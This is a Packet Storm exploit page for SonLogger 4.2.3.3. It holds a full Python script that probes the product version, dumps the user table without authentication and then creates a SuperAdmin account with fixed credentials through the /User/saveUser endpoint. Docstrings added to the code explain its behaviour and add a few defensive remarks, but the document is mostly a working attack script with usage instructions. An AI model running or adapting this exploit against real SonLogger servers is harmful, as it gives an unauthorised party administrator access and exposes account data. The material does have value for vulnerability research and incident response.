SonLogger 4.2.3.3 SuperAdmin Account Creation / Information Disclosure ≈ Packet Storm
# Exploit Title: Sonlogger 4.2.3.3 – SuperAdmin Account Creation / Information Disclosure
# Date: 04-02-2021
# Exploit Author: Berkan Er
# Vendor Homepage: https://www.sonlogger.com/
# Version: 4.2.3.3
# Tested on: Windows 10 Enterprise x64 Version 1803
# A remote attacker can create a user with the SuperAdmin profile
#!/usr/bin/python3
import argparse
import json
import string
import sys
from random import random

import requests
# Text printed at the start of every run; the last line is the author
# credit carried over from the original advisory.
banner = "\n".join(
    (
        "",
        "Sonlogger Log and Report System – v4.2.3.3",
        "Remote SuperAdmin Account Creation Vulnerability / Information Disclosure",
        "Berkan Er",
        "",
    )
)
# Headers attached to every request.  Note what is absent: no Cookie and
# no Authorization header -- the requests below rely on the server acting
# on these calls without any session.
commonHeaders = dict(
    [
        ("Content-type", "application/json"),
        ("Accept", "application/json, text/javascript, */*; q=0.01"),
        ("X-Requested-With", "XMLHttpRequest"),
    ]
)
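def get_random_string():
    """Return eight random lowercase ASCII letters, also echoing them to stdout.

    The module imports ``from random import random``, which binds the
    *function* ``random``, so ``random.choices`` raised AttributeError on
    the original line.  The function-scope import below binds the module
    name locally instead.  This helper is not called anywhere in the file.

    Returns:
        An 8-character ``str`` drawn from ``string.ascii_lowercase``.
    """
    import random

    res = "".join(random.choices(string.ascii_lowercase, k=8))
    print(res)
    return res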
def getProductInfo(host, port, flag):
    """Query an unauthenticated SonLogger instance and report its version.

    Two POST requests are sent, each carrying only ``commonHeaders`` -- no
    session cookie or credential of any kind: ``/shared/GetProductInfo``
    (version information) and ``/User/getUsers`` (the user table).  A server
    that answers the second request without authentication is the
    information-disclosure half of the advisory; from a monitoring point of
    view, unauthenticated POSTs to these two paths are the thing to alert on.

    Args:
        host: hostname or IP of the SonLogger server, as a string.
        port: TCP port as a string; it is concatenated into the URL.
        flag: when true, pretty-print both JSON responses.

    Returns:
        True when the reported ``Version`` equals exactly ``4.2.3.3``, else
        False.  Other builds are not tested further; they are simply
        reported as not vulnerable.
    """
    base = "http://" + host + ":" + port

    product_resp = requests.post(base + "/shared/GetProductInfo", data={}, headers=commonHeaders)
    product = product_resp.json()
    print("[*] Status code: ", product_resp.status_code)
    print("[*] Product Version: ", product["Version"])

    # The user table is requested regardless of flag; flag only controls printing.
    users_resp = requests.post(base + "/User/getUsers", data={}, headers=commonHeaders)

    if flag:
        print("\n*** Product Infos=\n" + json.dumps(product, indent=2))
        print("\n*** Users=\n" + json.dumps(users_resp.json(), indent=2))

    vulnerable = product["Version"] == "4.2.3.3"
    print("[+] It seems vulnerable !" if vulnerable else "[!] It doesn't vulnerable !")
    return vulnerable
def createSuperAdmin(host, port):
    """Send the user-creation request and dump the resulting user table.

    One unauthenticated POST to ``/User/saveUser`` with a fixed body whose
    ``_profilename`` is ``superadmin_profile``.  The response body is not
    inspected; only the status code is printed before success is announced.
    A second unauthenticated POST to ``/User/getUsers`` prints the user
    table so the new entry is visible.  The body uses single quotes and is
    therefore not strict JSON, although it is sent as ``application/json``.

    Args:
        host: hostname or IP of the SonLogger server, as a string.
        port: TCP port as a string.

    Returns:
        None.  For incident responders: the account created is the fixed
        ``_hacker`` / ``_hacker`` pair in the payload, a useful indicator
        when reviewing a SonLogger user table after the fact.
    """
    base = "http://" + host + ":" + port

    payload = (
        "{\n"
        "'_profilename':'superadmin_profile', \n"
        "'_username':'_hacker', \n"
        "'_password':'_hacker', \n"
        "'_fullname':'', '_email':''\n"
        "}"
    )

    saved = requests.post(base + "/User/saveUser", data=payload, headers=commonHeaders)
    print("[*] STAUTS CODE:", saved.status_code)
    print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker")

    users = requests.post(base + "/User/getUsers", data={}, headers=commonHeaders)
    print("\n*** Users=\n" + json.dumps(users.json(), indent=2))
def main():
    """Command-line entry point: ``<IP> <PORT> <TRUE|FALSE>``.

    ``TRUE`` runs the version probe and, only when it reports 4.2.3.3, the
    account creation; any other third argument runs the probe in verbose
    mode.  Argument parsing and the network calls share one bare ``except``,
    so a connection error or an unexpected response body prints the usage
    text instead of the real error.  ``argparse`` is imported at module
    level but not used here.
    """
    print(banner)

    try:
        # Too few arguments raises here and falls through to the usage text.
        host, port, action = sys.argv[1:4]

        if action == "TRUE":
            if getProductInfo(host, port, False):
                createSuperAdmin(host, port)
        else:
            getProductInfo(host, port, True)

        print("KTHNXBYE!")

    except:
        print(
            "Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP "
            "Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product "
            "Infos"
        )
        print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n")
# Run only when executed as a script; importing the module just defines the
# functions and constants above and sends no request.
if __name__ == "__main__":
    main()